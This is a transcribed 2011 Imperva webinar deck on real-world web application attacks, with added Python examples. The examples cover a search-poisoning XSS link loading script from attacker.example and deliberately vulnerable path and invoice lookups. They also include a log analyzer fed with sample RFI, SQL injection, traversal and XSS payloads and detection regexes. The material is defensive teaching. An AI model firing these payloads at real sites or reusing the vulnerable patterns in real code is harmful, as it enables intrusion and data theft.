The State of Application Security: What Hackers Break Amichai Shulman, CTO, Imperva

DESCRIPTION

Companies of all sizes face a universal security threat from today's organized hacking industry. Why? Hackers are decreasing costs and expanding their reach with tools and technologies that allow for automated attacks against Web applications. The hacker's arsenal includes armies of zombies (global networks of compromised computers) that access large amounts of personal and corporate data that can be sold on the black market. As part of Imperva's ongoing Hacker Intelligence Initiative, we monitored and categorized individual attacks across the Internet over a period of six months. This webinar details the results of this research, which encompasses attacks witnessed via Tor (The Onion Router) traffic as well as attacks targeting 30 different enterprise and government Web applications.

Page 1: The State of Application Security: What Hackers Break

The State of Application Security: What Hackers Break

Amichai Shulman, CTO, Imperva

Page 2

Agenda

The current state of Web vulnerabilities

Studying hackers

+ Why? Prioritizing defenses

+ How? Methodology

Analyzing real-life attack traffic

+ Key findings

+ Take-aways

Technical recommendations


Page 3

Imperva Overview

Imperva's mission is simple: Protect the data that drives business

The leader in a new category: Data Security

HQ in Redwood Shores CA; Global Presence

+ Installed in 50+ Countries

1,200+ direct customers; 25,000+ cloud users

+ 3 of the top 5 US banks

+ 3 of the top 10 financial services firms

+ 3 of the top 5 Telecoms

+ 2 of the top 5 food & drug stores

+ 3 of the top 5 specialty retailers

+ Hundreds of small and medium businesses


Page 4

Today’s Presenter

Amichai Shulman – CTO Imperva

Speaker at industry events

+ RSA, Sybase Techwave, Info Security UK, Black Hat

Lecturer on Info Security

+ Technion - Israel Institute of Technology

Former security consultant to banks and financial services firms

Leads the Application Defense Center (ADC)

+ Discovered over 20 commercial application vulnerabilities

– Credited by Oracle, MS-SQL, IBM and others

Amichai Shulman one of InfoWorld’s “Top 25 CTOs”

Page 5

WhiteHat Security Top Ten—2010

Percentage likelihood of a website having at least one vulnerability, sorted by class

Page 6

The Situation Today

357,292,065 websites (estimated, July 2011) × 230 vulnerabilities per website × 1% ≈ 821,771,600 vulnerabilities in active circulation

Page 7

The Situation Today

821,771,600 vulnerabilities in active circulation, but which will be exploited?

Page 8

Studying Hackers

Focus on actual threats

+ Focus on what hackers want, helping good guys prioritize

+ Technical insight into hacker activity

+ Business trends of hacker activity

+ Future directions of hacker activity

Eliminate uncertainties

+ Active attack sources

+ Explicit attack vectors

+ Spam content

Devise new defenses based on real data

+ Reduce guess work

Page 9

Understanding the Threat Landscape: Methodology

Analyze hacker tools and activity

Tap into hacker forums

Record and monitor hacker activity

+ Categorized attacks across 30 applications

+ Monitored Tor traffic

+ Recorded over 10M suspicious requests

+ 6 months: December 2010-May 2011

Page 10

Lesson #1: Automation is Prevailing

Attacks are automated

+ Botnets

+ Mass SQL Injection attacks

+ Google dorks

Page 11

Lesson #1: Automation is Prevailing

Tools and kits exist for everything

Page 12

Lesson #1: Automation is Prevailing

On average: 27 attacks per hour ≈ 1 attack per 2 minutes

Apps under automated attack: 25,000 attacks per hour ≈ 7 per second

Page 13

Lesson #1: Automation is Prevailing

Take-away: Get ready to fight automation

Page 14

Lesson #2: The "Unfab" Four

Page 15

Lesson #2A: The "Unfab" Four: SQL Injection

Page 16

Lesson #2B: The "Unfab" Four: Remote File Inclusion

Page 17

Lesson #2B: The "Unfab" Four: Remote File Inclusion

Analyzing the parameters and source of an RFI attack enhances common signature-based attack detection.

Page 18

Lesson #2C: The "Unfab" Four: Directory Traversal

Page 19

Lesson #2C: The "Unfab" Four: Directory Traversal

Page 20

Lesson #2D: The "Unfab" Four: Cross Site Scripting

Page 21

Lesson #2D: The "Unfab" Four: Cross Site Scripting

Page 22

Lesson #2D: The "Unfab" Four: Cross Site Scripting – Zooming into Search Engine Poisoning

http://HighRankingWebSite+PopularKeywords+XSS

Page 23

Lesson #2D: The "Unfab" Four: Cross Site Scripting

New Search Engine Indexing Cycle
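The poisoned link pattern on these two slides (HighRankingWebSite + PopularKeywords + XSS) only works because the high-ranking site reflects the search term into its page unencoded, so whatever the crawler or a victim follows the link with becomes part of the indexed page. The Python below is an added example, not code from the deck or from Imperva: it builds such a link, shows what the site reflects when the link is followed, and contrasts the vulnerable reflection with one that HTML-escapes the term. The site name, the `/search?q=` endpoint, the attacker host and the function names are assumptions for the illustration.

```python
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# Hypothetical high-ranking site used for the illustration (not a real target).
SITE = "https://www.highranking.example"


def render_search_unsafe(q):
    """Vulnerable: the search term is reflected into element content unescaped."""
    return f"<h1>Results for: {q}</h1>"


def render_search_safe(q):
    """Hardened: HTML-escape the term for the element-content context it lands in.
    (Attribute, URL and JavaScript contexts each need their own encoder.)"""
    return f"<h1>Results for: {html.escape(q, quote=True)}</h1>"


def poisoned_search_url(keywords, payload):
    """The slide's HighRankingWebSite + PopularKeywords + XSS link: an ordinary
    looking search URL whose term carries popular keywords plus the payload."""
    return f"{SITE}/search?" + urlencode({"q": f"{keywords} {payload}"})


def reflected_term(url):
    """What the site receives (and reflects) when a crawler or victim follows the link."""
    return parse_qs(urlsplit(url).query)["q"][0]


def contains_active_script(rendered):
    """Crude check used for the demonstration: is there an unescaped <script> tag?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    # Constructed attacker payload; the host is an illustration only.
    link = poisoned_search_url("cheap tickets", "<script src=https://attacker.example/x.js></script>")
    term = reflected_term(link)
    print(link)
    print(render_search_unsafe(term))   # script tag lands in the page as markup
    print(render_search_safe(term))     # script tag lands in the page as text
```

The search engine is the twist that makes this more than ordinary reflected XSS: the attacker does not need to lure victims to the link directly, because once the poisoned URL is indexed, the engine's results page does the luring for popular keywords.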

Page 24

Lesson #2: The "Unfab" Four

Take-away: Protect against these common attacks

These may seem like obvious, common attacks, but RFI and directory traversal do not even appear in the OWASP Top 10 (2010).

Page 25

Directory Traversal Missing from OWASP Top 10?

OWASP Rationale:

Directory traversal is covered in the OWASP Top Ten 2010 through the more general case, A4, Insecure Direct Object Reference.

"Insecure Direct Object Reference" is different from "Directory Traversal" because in the latter, access is made to a resource that should not have been available through the application to begin with.
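The distinction drawn above is easiest to see in code: traversal reaches a file the application never intended to serve (outside its document root), and the fix is a containment check on the path; an insecure direct object reference reaches a record the application does serve, but to the wrong user, and the fix is an authorization check against the caller. The Python below is an added example, not code from the deck or from OWASP; the document root, the invoice table and the function names are constructed for the illustration. It assumes the web framework has already percent-decoded the input, so `..%2f` arrives here as `../`.

```python
import posixpath

# Hypothetical document root and invoice table, constructed for the illustration.
DOC_ROOT = "/srv/app/public"
INVOICES = {
    1001: {"owner": "alice", "total": 120.00},
    1002: {"owner": "bob", "total": 75.50},
}

# --- Directory traversal: a resource the application never meant to serve ---


def resolve_unsafe(name):
    """Vulnerable pattern: user input joined onto the root with no containment
    check. '../../../etc/passwd' normalizes to a path outside DOC_ROOT."""
    return posixpath.normpath(posixpath.join(DOC_ROOT, name))


def resolve_safe(name):
    """Hardened: reject NUL bytes and absolute names, normalize, then require the
    result to stay under DOC_ROOT. On a real filesystem follow this lexical check
    with os.path.realpath so that symlinks cannot escape the root either."""
    if "\x00" in name or posixpath.isabs(name):
        raise PermissionError(f"rejected path: {name!r}")
    full = posixpath.normpath(posixpath.join(DOC_ROOT, name))
    if posixpath.commonpath([DOC_ROOT, full]) != DOC_ROOT:
        raise PermissionError(f"path escapes document root: {name!r}")
    return full


def escapes_root(name):
    """True when resolve_safe would refuse the name."""
    try:
        resolve_safe(name)
    except PermissionError:
        return True
    return False


# --- Insecure direct object reference: a served resource, but for the wrong user ---


def get_invoice_unsafe(user, invoice_id):
    """Vulnerable: the record is looked up by the id the client supplied and
    ownership is never checked, so bob reads alice's invoice by changing the number."""
    return INVOICES[invoice_id]


def get_invoice_safe(user, invoice_id):
    """Hardened: the id is only honoured when the record belongs to the caller."""
    inv = INVOICES.get(invoice_id)
    if inv is None or inv["owner"] != user:
        raise PermissionError(f"{user} may not read invoice {invoice_id}")
    return inv


def may_read_invoice(user, invoice_id):
    """True when get_invoice_safe would return the record to this user."""
    try:
        get_invoice_safe(user, invoice_id)
    except PermissionError:
        return False
    return True


if __name__ == "__main__":
    print(resolve_unsafe("../../../etc/passwd"))   # /etc/passwd: outside the root
    print(escapes_root("../../../etc/passwd"))      # True: the hardened version refuses it
    print(get_invoice_unsafe("bob", 1001))           # alice's invoice leaks to bob
    print(may_read_invoice("bob", 1001))             # False: the hardened version refuses it
```

Note that the traversal fix says nothing about who the caller is, and the IDOR fix says nothing about paths: the two checks guard different boundaries, which is the point of the objection to folding one into the other.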

Page 26

Remote File Inclusion Missing from OWASP Top 10?

Malicious File Execution was A3 in the OWASP Top 10 2007 and was removed in the OWASP Top 10 2010.

OWASP Rationale:

REMOVED: A3 – Malicious File Execution. This is still a significant problem in many different environments. However, its prevalence in 2007 was inflated by large numbers of PHP applications having this problem. PHP now ships with a more secure configuration by default, lowering the prevalence of this problem.

Page 27

Lesson #3: The U.S. is the Source of Most Attacks

We witnessed 29% of attack events originating from 10 sources.

Page 28

Lesson #3: The U.S. is the Source of Most Attacks

Take-away: Sort traffic based on reputation
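Lessons 1 to 3 are three measurements over the same attack traffic: per-class counts of the "Unfab" Four, the per-source peak rate that separates automated sources (thousands of attacks per hour) from the background (tens per hour), and the share of attack events coming from a handful of sources, which is what makes sorting by reputation pay off. The slide on RFI also notes that the parameters and source of an RFI attempt add to what a signature alone gives: the URL in the parameter names the host serving the payload. The Python below is an added example, not Imperva's tooling or anything shown in the deck; it runs these measurements over a constructed, labelled sample of access-log lines. The log format, the signature regexes, the 600-attacks-per-hour automation threshold, and all addresses and hostnames are assumptions for the illustration.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumed log format: <src_ip> [<timestamp>] "<METHOD> <path?query> HTTP/x" <status>
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})$'
)

# Deliberately coarse decoded-value signatures for the four classes on the slides.
SQLI_RE = re.compile(r"(?i)(?:'\s*(?:or|and)\s+[\w']+\s*=|\bunion\s+(?:all\s+)?select\b|--\s*$|;\s*(?:drop|insert|update)\b)")
DT_RE = re.compile(r"(?:\.\./|\.\.\\|/etc/passwd|boot\.ini)")
XSS_RE = re.compile(r"(?i)(?:<script\b|javascript:|\bon(?:error|load|mouseover)\s*=)")
RFI_RE = re.compile(r"(?i)^(?:https?|ftp)://")


def parse_line(line):
    """Parse one log line; None for lines that do not match the assumed format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def classify(target, own_hosts=frozenset()):
    """Return (attack classes, RFI payload hosts) for one request target.
    parse_qsl already percent-decodes once; decoding again also catches
    double-encoded payloads. An RFI is a parameter whose value is a URL to a host
    the application does not own; that host is where the attacker's code lives."""
    parts = urlsplit(target)
    values = [unquote(v) for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    values.append(unquote(parts.path))
    classes, rfi_hosts = set(), []
    for v in values:
        if SQLI_RE.search(v):
            classes.add("sqli")
        if DT_RE.search(v):
            classes.add("dt")
        if XSS_RE.search(v):
            classes.add("xss")
        if RFI_RE.match(v):
            host = urlsplit(v).hostname or ""
            if host not in own_hosts:
                classes.add("rfi")
                rfi_hosts.append(host)
    return classes, rfi_hosts


def peak_rate_per_hour(timestamps, window=timedelta(minutes=1)):
    """Peak attack rate of one source, scaled to attacks per hour, over a sliding window."""
    ts = sorted(timestamps)
    best = lo = 0
    for hi in range(len(ts)):
        while ts[hi] - ts[lo] >= window:
            lo += 1
        best = max(best, hi - lo + 1)
    return best * (timedelta(hours=1) / window)


def analyze(log_text, own_hosts=frozenset(), automated_threshold=600, top_n=10):
    """Count attack events per class and per source, flag sources whose peak rate
    looks automated, and compute the share of events from the top-N sources."""
    per_class, per_source, times, rfi_events = Counter(), Counter(), defaultdict(list), []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        classes, hosts = classify(rec["target"], own_hosts)
        if not classes:
            continue
        per_class.update(classes)
        per_source[rec["ip"]] += 1
        times[rec["ip"]].append(rec["ts"])
        rfi_events.extend((rec["ip"], h) for h in hosts)
    automated = {ip for ip, t in times.items() if peak_rate_per_hour(t) >= automated_threshold}
    total = sum(per_source.values())
    top_share = sum(n for _, n in per_source.most_common(top_n)) / total if total else 0.0
    return {"per_class": dict(per_class), "per_source": dict(per_source),
            "automated": automated, "rfi_events": rfi_events, "top_share": top_share}


# Constructed sample traffic: a few hand-written requests plus a 40-request RFI scan
# from one source at one request per second, so that one source looks automated.
_HAND = """\
203.0.113.7 [12/Jan/2011:10:00:01 +0000] "GET /index.php?page=http://evil.example/shell.txt? HTTP/1.1" 200
198.51.100.9 [12/Jan/2011:10:00:03 +0000] "GET /item.php?id=1%27%20OR%201%3D1-- HTTP/1.1" 200
198.51.100.9 [12/Jan/2011:10:00:04 +0000] "GET /download?file=../../../../etc/passwd HTTP/1.1" 404
203.0.113.7 [12/Jan/2011:10:00:05 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200
192.0.2.44 [12/Jan/2011:10:00:06 +0000] "GET /about HTTP/1.1" 200
198.51.100.9 [12/Jan/2011:10:30:00 +0000] "GET /item.php?id=0%20UNION%20SELECT%20user,pass%20FROM%20users HTTP/1.1" 500
"""
_SCAN = "\n".join(
    f'203.0.113.7 [12/Jan/2011:10:00:{10 + i:02d} +0000] "GET /p{i}.php?page=http://evil.example/shell.txt? HTTP/1.1" 200'
    for i in range(40)
)
SAMPLE_LOG = _HAND + _SCAN + "\n"

if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for key in ("per_class", "per_source", "automated", "top_share"):
        print(key, report[key])
    print("rfi payload hosts:", sorted({h for _, h in report["rfi_events"]}))
```

The automation threshold is set from the slides' own numbers: a baseline of 27 attacks per hour against 25,000 per hour when an application is under automated attack leaves a wide band in which to place the cut-off. In practice the top-N share would be replaced by a reputation feed of known sources, and the RFI payload hosts collected here are exactly the kind of data worth contributing back to such a feed.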

Page 29

Organizations like these Funded a $27B Security Market in 2010…

…All had major breaches in 2011. What’s wrong?

Page 30

Threat vs. Spending Market Dislocation

Threats:

In 2010, 76% of all data breached was from servers and applications [1]

The data theft industry is estimated at $1 trillion annually

Organized crime is responsible for 85% of data breaches [1]

Spending:

Yet well over 90% of the $27 billion spent on security products was on traditional security [2]

[1] 2011 Data Breach Investigations Report (Verizon RISK Team in conjunction with the US Secret Service & Dutch High Tech Crime Unit)

[2] Worldwide Security Products 2011-2014 Forecast (IDC, February 2011)

Page 31

Summary

Deploy security solutions that deter automated attacks

Detect known vulnerability attacks

Acquire intelligence on malicious sources and apply it in real time

Participate in a security community and share data on attacks

Page 32

Summary

"Foreknowledge cannot be gotten from ghosts and spirits, cannot be had by analogy, cannot be found out by calculation. It must be obtained from people, people who know the conditions of the enemy" [1]

[1] Sun Tzu, The Art of War

Page 33

Imperva: Our Story in 60 Seconds

Usage Audit, Access Control, Rights Management, Attack Protection, Reputation Controls, Virtual Patching

Page 34

Webinar Materials

Get LinkedIn to Imperva Data Security Direct for…

Post-Webinar Discussions

Answers to Attendee Questions

Webinar Recording Link

Much more…

Page 35

Questions

- CONFIDENTIAL -

Page 36

Thank You